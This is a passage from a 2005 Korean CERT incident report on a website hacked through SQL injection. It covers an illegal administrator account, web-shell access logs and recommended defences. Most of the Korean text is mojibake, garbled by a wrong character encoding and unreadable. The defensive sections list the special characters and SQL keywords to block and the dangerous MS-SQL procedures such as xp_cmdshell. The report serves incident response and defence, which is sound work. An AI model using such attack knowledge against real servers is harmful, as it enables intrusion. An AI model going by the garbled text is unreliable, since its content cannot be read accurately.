¡à ºÒ¹ý »ç¿ëÀÚ °èÁ¤ »ý¼º
ÇÇÇØ ½Ã½ºÅÛ¿¡´Â kyo¶ó´Â ºÒ¹ý »ç¿ëÀÚ °èÁ¤ÀÌ »ý¼ºµÇ¾î ÀÖ¾ú´Ù. ¶ÇÇÑ, ÀÌ °èÁ¤Àº °ü¸®ÀÚ ±×·ì¿¡
¼ÓÇØ ½Ã½ºÅÛ °ü¸®ÀÚ ±ÇÇÑÀ¸·Î ¾ÇÀÇÀûÀÎ ÇàÀ§°¡ °¡´ÉÇß´ø °ÍÀ¸·Î º¸¿©Áö¸ç, ÇØ´ç °èÁ¤ÀÇ µð·ºÅ丮
¿¡¼ ÇØÅ· ÇÁ·Î±×·¥ µîÀÌ ¹ß°ßµÇ¾ú´Ù.
¶ÇÇÑ, ¾Æ·¡ ·Î±×´Â xxx.xxx.xx.203¶ó´Â IP ÁּҷκÎÅÍ kyo¶ó´Â °èÁ¤À¸·Î ¾Õ¼ »ìÆìº» ¾Ç¼º ASP
ÆÄÀÏ(ok7.asp)¿¡ Á¢±ÙÇÑ °ÍÀ» ¾Ë ¼ö ÀÖ´Ù.
ex050616.log:2005-06-16 14:02:02 xxx.xxx.xx.203 - victim_IP 80 GET /gallery/ok7.asp kyo 200
Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0;+i-NavFourF)
ex050616.log:2005-06-16 14:02:10 xxx.xxx.xx.203 - victim_IP 80 POST /gallery/ok7.asp - 200
Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0;+i-NavFourF)
ex050616.log:2005-06-16 14:02:21 xxx.xxx.xx.203 - victim_IP 80 GET /gallery/ok7.asp kyo 200
Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0;+i-NavFourF)
KrCERT-IN-2005-012 http://www.krcert.or.kr
À¥ ÇØÅ·À» ÅëÇÑ ¾Ç¼º ÄÚµå À¯Æ÷ »çÀÌÆ® »ç°í »ç·Ê cert@krcert.or.kr
_______________________________________________________________________________________ _
__________________________________________________________________________________________
KISC
ÀÎÅͳÝÄ§ÇØ»ç°í´ëÀÀÁö¿ø¼¾ÅÍ - 9 -
5. Áß±¹¿¡¼ Á¦ÀÛµÈ °ÍÀ¸·Î ÃßÁ¤µÇ´Â À¥ ¼¹ö °ø°Ý µµ±¸
ÃÖ±Ù ¹ß»ýµÇ°í ÀÖ´Â IIS À¥¼¹ö¿¡ ´ëÇÑ °ø°ÝÀº ±¤¹üÀ§ÇÏ°Ô ÀÌ·ç¾îÁö°í Àִµ¥ ÀÌ´Â ÀÚµ¿ÈµÈ °ø
°Ýµµ±¸°¡ °ø°ÝÀÚµé »çÀÌ¿¡¼ °øÀ¯µÇ°í Àֱ⠶§¹®ÀÌ´Ù.
ƯÈ÷, Áß±¹ ÇØÅ·°ü·Ã »çÀÌÆ®¿¡¼ MS-SQL ¼¹ö¿¡ ´ëÇØ SQL Injection °ø°ÝÀ» ÇÒ ¼ö ÀÖ´Â µµ±¸¿Í
°ø°Ý¹æ¹ýµéÀÌ °øÀ¯µÇ°í ÀÖ´Ù.
¾Æ·¡ ±×¸²Àº ÀÎÅͳÝÀ» ÅëÇØ °ø°³µÇ°í ÀÖ´Â Áß±¹¿¡¼ Á¦ÀÛµÈ °ÍÀ¸·Î ÃßÁ¤µÇ´Â °ø°Ý µµ±¸ ÁßÀÇ
Çϳª·Î½á, º» »ç°íÀÇ ÇÇÇØ ½Ã½ºÅÛÀ» ´ë»óÀ¸·Î °ø°Ý ½ÃµµÇßÀ» °æ¿ì ½±°Ô SQL Injection °ø°ÝÀÌ ¼º
°øÇϰí, DB¿¡ ÀúÀåµÇ¾î ÀÖ´Â °ü¸®ÀÚ °èÁ¤°ú ÆÐ½º¿öµå°¡ ³ëÃâµÇ´Â °ÍÀ» º¼ ¼ö ÀÖ¾ú´Ù.
°ø°ÝÀº ÇÇÇØ ½Ã½ºÅÛÀÇ ·Î±×¿¡ ³²Àº °øÁö»çÇ×ÀÇ ÀÎÀÚ°ª¿¡ ´ëÇÑ SQL Injection Ãë¾àÁ¡À» ÀÌ¿ëÇÏ¿´´Ù.
ÀÎÅÍ³Ý »ó¿¡´Â »ó±â µµ±¸¿Í À¯»çÇÑ SQL Injection °ø°Ý µµ±¸¿Í À¥»ó¿¡¼ Shell ±ÇÇÑÀ» ȹµæÇÒ
¼ö ÀÖ´Â µµ±¸ µîÀÌ ´Ù¼ö Á¸ÀçÇϹǷΠÀ¥ °ü¸®ÀÚµéÀÇ ÁÖÀǰ¡ ¿ä±¸µÈ´Ù.
KrCERT-IN-2005-012 http://www.krcert.or.kr
À¥ ÇØÅ·À» ÅëÇÑ ¾Ç¼º ÄÚµå À¯Æ÷ »çÀÌÆ® »ç°í »ç·Ê cert@krcert.or.kr
_______________________________________________________________________________________ _
__________________________________________________________________________________________
KISC
ÀÎÅͳÝÄ§ÇØ»ç°í´ëÀÀÁö¿ø¼¾ÅÍ - 10 -
6. º¸¾È ´ëÃ¥
ÃÖ±Ù Áß±¹¿¡ ÇÒ´çµÈ IP·ÎºÎÅÍÀÇ °ø°ÝÀÌ Áõ°¡Çϰí ÀÖÀ¸¸ç, Áß±¹ ÇØÄ¿¿¡ ÀÇÇØ Á¦ÀÛµÈ °ÍÀ¸·Î ÃßÁ¤
µÇ´Â °¢Á¾ ÇØÅ· µµ±¸µéÀÌ °ø°³µÊ¿¡ µû¶ó ´ë±Ô¸ð °ø°ÝÀÌ ¹ß»ýµÉ ¼ö ÀÖ¾î ±¹³» ȨÆäÀÌÁö °ü¸®ÀÚµé
ÀÇ ÁÖÀǰ¡ ¿ä±¸µÈ´Ù.
º» »ç°íÀÇ ºÐ¼®°á°ú¸¦ ÅëÇØ ¾Ë¼ö ÀÖµíÀÌ °ø°ÝÀÚ´Â »ç¿ëÀÚ ÀԷ°ªÀ̳ª URL ÀÎÀÚ°ª¿¡ Á¸ÀçÇÏ´Â
SQL Injection Ãë¾àÁ¡À» ÀÌ¿ëÇÏ¿© MS-SQL DB ¼¹ö¸¦ °ø°ÝÇÏ¿´´Ù. ÀÌ´Â ±âÁ¸ÀÇ ½Ã½ºÅÛÀ̳ª À¥ ¾Ö
Çø®ÄÉÀ̼ÇÀÇ º¸¾È ÆÐÄ¡ ¸¸À¸·Î´Â ÇØ°áÇÒ ¼ö ¾ø°í, ÀÚüÀûÀ¸·Î ȨÆäÀÌÁö¸¦ °³¹ßÇÒ ¶§ ¼³°è․°³¹ß
´Ü°è¿¡¼ºÎÅÍ º¸¾ÈÀ» °í·ÁÇÏ¿© ȨÆäÀÌÁö¸¦ ±¸ÃàÇÏ¿©¾ß ÇÒ Çʿ䰡 ÀÖ´Ù. º» »ç°íÀÇ °æ¿ìµµ À¥ È£½º
ÆÃ ¾÷ü¿¡¼ ½Ã½ºÅÛ ÀÚüÀÇ º¸¾È ÆÐÄ¡´Â ÁÖ±âÀûÀ¸·Î ÀÌ·ç¾îÁö°í ÀÖ¾úÁö¸¸, ½ÇÁ¦ ȨÆäÀÌÁö¸¦ ¿î¿µ
ÇÏ´Â °í°´»çÀÇ È¨ÆäÀÌÁö¿¡ SQL Injection°ú °°Àº º¸¾È Ãë¾àÁ¡ÀÌ Á¸ÀçÇÏ¿© °ø°ÝÀ» ¹ÞÀº °æ¿ì¿´´Ù.
º» »ç°í¿Í À¯»çÇÑ »ç°íÀÇ Àç¹ßÀ» ¹æÁöÇϱâ À§ÇØ ´ÙÀ½°ú °°Àº º¸¾È´ëÃ¥ÀÌ ¿ä±¸µÈ´Ù.
¡à »ç¿ëÀÚ ÀԷ°ª °ËÁõ(SQL Injection Ãë¾àÁ¡ Á¦°Å)
º» »ç°íÀÇ °¡Àå ±Ùº»ÀûÀÎ ¿øÀÎÀº ´Ù¾çÇÑ °æ·Î¸¦ ÅëÇÑ »ç¿ëÀÚ ÀԷ°ªÀ̳ª URLÀÇ ÀÎÀÚ°ª¿¡ ´ëÇÑ
°ËÁõÀÌ ÀÌ·ç¾îÁöÁö ¾Ê¾Ò´Ù´Â °ÍÀÌ´Ù. µû¶ó¼, SQL Injection °ø°ÝÀ» ¹æ¾îÇϱâ À§ÇØ »ç¿ëÀÚ ÀԷ°ª
À̳ª URL ÀÎÀÚ°ª¿¡ ´ëÇÑ °ËÁõÀÌ ¿ì¼±½Ã µÇ¾î¾ß ÇÑ´Ù.
o µ¥ÀÌÅͺ£À̽º¿Í ¿¬µ¿À» ÇÏ´Â ½ºÅ©¸³Æ®ÀÇ ¸ðµç ÆÄ¶ó¹ÌÅ͵éÀ» Á¡°ËÇÏ¿© »ç¿ëÀÚÀÇ ÀÔ·Â °ªÀÌ
SQL injectionÀ» ¹ß»ý½ÃŰÁö ¾Êµµ·Ï ¼öÁ¤ÇÑ´Ù.
o »ç¿ëÀÚ ÀÔ·ÂÀÌ SQL injectionÀ» ¹ß»ý½ÃŰÁö ¾Êµµ·Ï »ç¿ëÀÚ ÀÔ·Â ½Ã Ư¼ö¹®ÀÚ(' " / \ ; : Space
-- +µî)¿Í SQL ±¸¹®(union, select, insert µî)ÀÌ Æ÷ÇԵǾî ÀÖ´ÂÁö °Ë»çÇÏ¿© Çã¿ëµÇÁö ¾ÊÀº ¹®ÀÚ
¿À̳ª ¹®ÀÚ°¡ Æ÷ÇÔµÈ °æ¿ì¿¡´Â ¿¡·¯·Î ó¸®ÇÑ´Ù.
o SQL ¼¹öÀÇ ¿¡·¯ ¸Þ½ÃÁö¸¦ »ç¿ëÀÚ¿¡°Ô º¸¿©ÁÖÁö ¾Êµµ·Ï ¼³Á¤ÇÑ´Ù. °ø°ÝÀÚ´Â ¸®ÅÏ µÇ´Â ¿¡·¯
¸Þ½ÃÁö¿¡ ´ëÇÑ ºÐ¼®À» ÅëÇÏ¿© °ø°Ý¿¡ ¼º°øÇÒ ¼ö ÀÖ´Â SQL Injection ½ºÆ®¸µÀ» ¾Ë¾Æ³¾ ¼ö ÀÖ´Ù.
µû¶ó¼ SQL ¼¹öÀÇ ¿¡·¯ ¸Þ½ÃÁö¸¦ ¿ÜºÎ¿¡ Á¦°øÇÏÁö ¾Êµµ·Ï ÇÑ´Ù.
KrCERT-IN-2005-012 http://www.krcert.or.kr
À¥ ÇØÅ·À» ÅëÇÑ ¾Ç¼º ÄÚµå À¯Æ÷ »çÀÌÆ® »ç°í »ç·Ê cert@krcert.or.kr
_______________________________________________________________________________________ _
__________________________________________________________________________________________
KISC
ÀÎÅͳÝÄ§ÇØ»ç°í´ëÀÀÁö¿ø¼¾ÅÍ - 11 -
¡à ºÒÇÊ¿äÇÑ È®Àå ÀúÀå ÇÁ·Î½ÃÁ® Á¦°Å
MS-SQL ¼¹ö¿¡¼ Á¦°øÇϰí ÀÖ´Â È®Àå ÀúÀå ÇÁ·Î½ÃÁ® Áß »ç¿ëÇÏÁö ¾Ê´Â ÇÁ·Î½ÃÁ®µéÀ» Á¦°Å
Çϵµ·Ï ÇÑ´Ù. xp_cmdshell, xp_regread, xp_dirtree¿Í °°Àº ÇÁ·Î½ÃÁ®µéÀº °ø°ÝÀÚ¿¡ ÀÇÇØ ÀÌ¿ëµÉ ¼ö
ÀÖÀ¸¹Ç·Î °¡´ÉÇÑ Á¦°ÅÇÏ´Â °ÍÀÌ ¹Ù¶÷Á÷ÇÏ´Ù.
¡à ¿ø°ÝÁö¿¡¼ SQL ¼¹ö ½ÇÇà ±ÝÁö
¿ø°ÝÁö¿¡¼ µ¥ÀÌÅͺ£À̽º¿¡ ´ëÇÑ ÁúÀǸ¦ °¡´ÉÇÏ°Ô ÇÏ´Â ¡®ad-hoc' ÁúÀǸ¦ ±ÝÁö½ÃŲ´Ù. ¡¯ad-hoc'
ÁúÀÇ´Â OPENROWSET °°Àº ÇÔ¼ö¿¡ ÀÇÇØ °¡´ÉÇѵ¥, ·¹Áö½ºÆ®¸® ÆíÁýÀ» ÅëÇØ ÀÌ ±â´ÉÀ» Â÷´ÜÇÒ ¼ö
ÀÖ´Ù.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MSSQLServer\Providers\Microsoft.Jet.OLEDB.4.0]
"DisallowAdhocAccess"=dword:00000001
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MSSQLServer\Providers\MSDAORA]
"DisallowAdhocAccess"=dword:00000001
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MSSQLServer\Providers\MSDASQL]
"DisallowAdhocAccess"=dword:00000001
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MSSQLServer\Providers\SQLOLEDB]
"DisallowAdhocAccess"=dword:00000001
À߸øµÈ ·¹Áö½ºÆ®¸® ÆíÁýÀº ½Ã½ºÅÛÀÇ ¿Àµ¿ÀÛÀ» ¾ß±âÇÒ ¼ö ÀÖÀ¸¹Ç·Î, ad-hoc ÁúÀÇ ±ÝÁö¿¡ ´ëÇÑ ´Ù
À½ÀÇ MSÞä ¹®¼¸¦ Âü°íÇÏ¿© ½ÅÁßÇÏ°Ô ÁøÇàÇϱ⠹ٶõ´Ù.
http://support.microsoft.com/default.aspx?scid=kb;ko;256052
KrCERT-IN-2005-012 http://www.krcert.or.kr
À¥ ÇØÅ·À» ÅëÇÑ ¾Ç¼º ÄÚµå À¯Æ÷ »çÀÌÆ® »ç°í »ç·Ê cert@krcert.or.kr
_______________________________________________________________________________________ _
__________________________________________________________________________________________
KISC
ÀÎÅͳÝÄ§ÇØ»ç°í´ëÀÀÁö¿ø¼¾ÅÍ - 12 -
¡à Inboud/Outbound Æ®·¡ÇÈ ÇÊÅ͸µ
IPSec, ¶ó¿ìÅÍ, ħÀÔÂ÷´Ü½Ã½ºÅÛ µîÀ» ÀÌ¿ëÇÏ¿© SQL ¼¹ö¿¡ ´ëÇÑ ÇÊÅ͸µÀ» ½Ç½ÃÇÑ´Ù. ¿î¿ëµÇ´Â
½Ã½ºÅÛÀÇ È¯°æ¿¡ µû¶ó ´Ù¸£°ÚÁö¸¸, SQL ¼¹öÀÇ 1433/TCP, 1434/UDP¿¡ ´ëÇÑ Á÷Á¢ÀûÀÎ Á¢¼ÓÀ» Â÷
´ÜÇÑ´Ù. ¶ÇÇÑ SQL ¼¹ö¿¡¼ ¿ÜºÎ·ÎÀÇ ºÒÇÊ¿äÇÑ Á¢¼Óµµ Â÷´ÜÇÏ¿© °ø°ÝÀÚ¿¡ ÀÇÇÑ reverse
connectionÀ» Â÷´ÜÇÒ ¼ö ÀÖµµ·Ï ÇÑ´Ù.
¡à ÁÖ±âÀûÀÎ ·Î±× °Ë»ç
º» »ç°í ºÐ¼®°á°ú¿¡¼ ¾Ë ¼ö ÀÖµíÀÌ ÃÖ±Ù ¹ß»ýµÇ°í ÀÖ´Â »ç°í´Â SQL °ø°Ý ÈçÀûÀ̳ª °ø°ÝÀÚÀÇ Çà
À§ µîÀÌ IIS À¥ ·Î±×¿¡ ³²´Â´Ù. µû¶ó¼, À¥¼¹ö °ü¸®ÀÚ´Â ·Î±×¸¦ ÁÖ±âÀûÀ¸·Î °Ë»çÇÏ¿© °ø°ÝÀÚ¿¡ ÀÇÇÑ
ħÀÔ¿©ºÎ¸¦ È®ÀÎÇϰí, Ãë¾àÇÑ ºÎºÐÀ» °Ë»öÇÒ Çʿ䰡 ÀÖ´Ù.
¡à °ü¸®ÀÚ ÆäÀÌÁö¿¡ ´ëÇÑ Á¢±Ù ÅëÁ¦
°ü¸®ÀÚ ·Î±×ÀÎ ÆäÀÌÁö ÁÖ¼Ò¸¦ À¯ÃßÇϱ⠾î·Á¿î À̸§À¸·Î º¯°æÇϰí, ¾Æ·¡¿Í °°Àº À¯Ãß °¡´ÉÇÑ ÀÌ
¸§À» °ü¸®ÀÚ ÆäÀÌÁö·Î »ç¿ëÇÏ´Â °ÍÀ» ±ÝÁöÇÑ´Ù.
http://admin.victim.com
http://www.victim.com/admin/
http://www.victim.com/manager/
http://www.victim.com/master/
http://www.victim.com/system/
¶ÇÇÑ, °ü¸®ÀÚ PC¿¡¼¸¸ ȨÆäÀÌÁö °ü¸®ÀÚ ÆäÀÌÁö¿¡ Á¢±ÙÇÒ ¼ö ÀÖµµ·Ï IPº° Á¢±ÙÅëÁ¦¸¦ ½Ç½ÃÇÑ´Ù.
IIS À¥¼¹öÀÇ °æ¿ì ¾Æ·¡ÀÇ ¹æ¹ýÀ¸·Î °ü¸®ÀÚ ÆäÀÌÁö¿¡ ´ëÇÑ Á¢±ÙÀ» Á¦ÇÑÇÒ ¼ö ÀÖ´Ù.
․ ¼³Á¤¡æÁ¦¾îÆÇ¡æ°ü¸®µµ±¸¡æÀÎÅÍ³Ý ¼ºñ½º °ü¸®ÀÚ ¼±ÅÃ
․ ÇØ´ç °ü¸®ÀÚ ÆäÀÌÁö Æú´õ¿¡ ¿À¸¥ÂÊ Å¬¸¯À» ÇÏ°í µî·ÏÁ¤º¸¡æµð·ºÅ丮 º¸¾È¡æIP ÁÖ¼Ò ¹× µµ
¸ÞÀÎ À̸§ Á¦ÇÑ¡æÆíÁý ¹öưÀ» Ŭ¸¯
․ ¾×¼¼½º °ÅºÎ¸¦ ¼±ÅÃÇϰí Ãß°¡ ¹öưÀ» Ŭ¸¯ÇÏ¿© °ü¸®ÀÚ È£½ºÆ®IP ¶Ç´Â ¼ºê³ÝÀ» µî·Ï
KrCERT-IN-2005-012 http://www.krcert.or.kr
À¥ ÇØÅ·À» ÅëÇÑ ¾Ç¼º ÄÚµå À¯Æ÷ »çÀÌÆ® »ç°í »ç·Ê cert@krcert.or.kr
_______________________________________________________________________________________ _
__________________________________________________________________________________________
KISC
ÀÎÅͳÝÄ§ÇØ»ç°í´ëÀÀÁö¿ø¼¾ÅÍ - 13 -
À̿ܿ¡µµ ȨÆäÀÌÁö °³¹ß °úÁ¤¿¡¼ ´Ù¾çÇÑ Ãë¾àÁ¡ÀÌ Á¸ÀçÇÒ ¼ö ÀÖÀ¸¹Ç·Î KISA¿¡¼ Á¦ÀÛÇÑ ¡¸È¨
ÆäÀÌÁö °³¹ß º¸¾È °¡À̵塹¸¦ Âü°íÇÏ¿© ´Ù¾çÇÑ Ãë¾àÁ¡¿¡ ´ëÇÑ º¸¿ÏÀ» ÇÏ´Â °ÍÀÌ ¹Ù¶÷Á÷ÇÏ´Ù.
o ȨÆäÀÌÁö °³¹ß º¸¾È °¡ÀÌµå ´Ù¿î·Îµå :
http://www.kisa.or.kr/news/2005/announce_20050427_submit.html
ƯÈ÷, ÃÖ±Ù ÇØÅ·Àº ´Ü¼øÇÑ È¨ÆäÀÌÁö º¯Á¶ ¼öÁØÀÌ ¾Æ´Ï¶ó À̸¦ ÀÌ¿ëÇÏ¿© °ÔÀÓ ºñ¹Ð¹øÈ£ À¯Ãâ, ±Ý
À¶Á¤º¸ À¯Ãâ µî ±ÝÀüÀû À̵æÀ» À§ÇÑ ÇØÅ·À¸·Î ¹ßÀüÇϰí ÀÖ´Ù. ÀÌ¿¡ µû¶ó ÇØÅ· ¼ö¹ýµµ °¥¼ö·Ï Áö´É
ÈµÇ¾î °¡°í ÀÖÀ¸¹Ç·Î ȨÆäÀÌÁö °ü¸®ÀÚµéÀº ÀÌ¿¡ ´ëÀÀÇϱâ À§ÇØ È¨ÆäÀÌÁöÀÇ º¸¾ÈÁ¶Ä¡¿¡ °¢º°È÷
½Å°æÀ» ½á¾ß ÇÒ °ÍÀÌ´Ù.
Âü°í ÀÚ·á
Manipulating Microsoft SQL Server, MySQL, Oracle Using SQL Injection & Auto Vulnerable
Scanning, http://www.securitymap.net/, ½ÉÁ¤Àç
Advanced SQL Injection In SQL Server Applications, http://www.ngssoftware.com, Chris Anley
(more) Advanced SQL Injection, http://www.ngssoftware.com, Chris Anley